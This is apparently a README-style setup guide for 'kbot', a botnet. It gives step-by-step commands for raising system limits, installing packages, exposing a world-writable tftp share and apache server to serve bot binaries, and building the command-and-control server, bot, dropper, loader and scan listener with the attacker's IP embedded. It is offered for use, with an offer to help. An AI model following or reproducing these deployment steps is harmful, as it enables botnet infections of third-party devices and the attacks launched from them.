
~ set ulimit ~

ulimit -Hn 999999; ulimit -Sn 999999
echo -e 'ulimit -s 999999; ulimit -n 999999; ulimit -u 999999\n' > ~/.bashrc
ulimit -s 999999; ulimit -n 999999; ulimit -u 999999
sysctl -w fs.file-max=999999 >/dev/null

~ installs ~

apt-get update -y;apt-get upgrade -y; apt-get install nano screen gcc golang electric-fence sudo git apache2 xinetd tftpd tftp -y

~ setting up apache/tftp ~

nano /etc/xinetd.d/tftp
 
- add this in that file (it will be empty cause your making the file lol) -

service tftp
{
protocol        = udp
port            = 69
socket_type     = dgram
wait            = yes
user            = nobody
server          = /usr/sbin/in.tftpd
server_args     = /tftpboot
disable         = no
}

- then do this shit -

sudo mkdir /tftpboot
sudo chmod -R 777 /tftpboot 
sudo chown -R nobody /tftpboot
sudo /etc/init.d/xinetd stop
sudo /etc/init.d/xinetd start
service apache2 start

service xinetd restart
service apache2 restart

~ building cnc ~


gcc cnc.c -o cnc -pthread

- add logins to "logins.txt" like so -

user password Admin/notadmin

~ building bot ~

- there is multiple spots you need to encrypt your server ip -

connection.c
telnet.c
exploit.c 

- to enc the ip go into kbot/encryption and do ( gcc encrypt.c -o e | ./e "string/ip" ) -

./build.sh | will build the bot (i have the compilers on my pc so for you you would use cross_compilers.sh in kbot/misc/ to get the compilers)

~ building dropper ~

edit ip in kbot/dropper/retrieve/retrieve.c

./build.sh | will build the dropper (again i have the compilers on my pc lol so you would use cross_compilers.sh)

- you then wanna copy the droppers from kbot/dropper/retrieve/binarys/ to kbot/loader/bins/ -

~ building loader ~

- edit ip in kbot/loader/src/main.c -

./build.sh | will build the loader

- dont forget to buuld the scanlisten - 

go build scanListen.go

~ tah dah you hopefully you now have kbot setup lol if not hmu and ill help ~

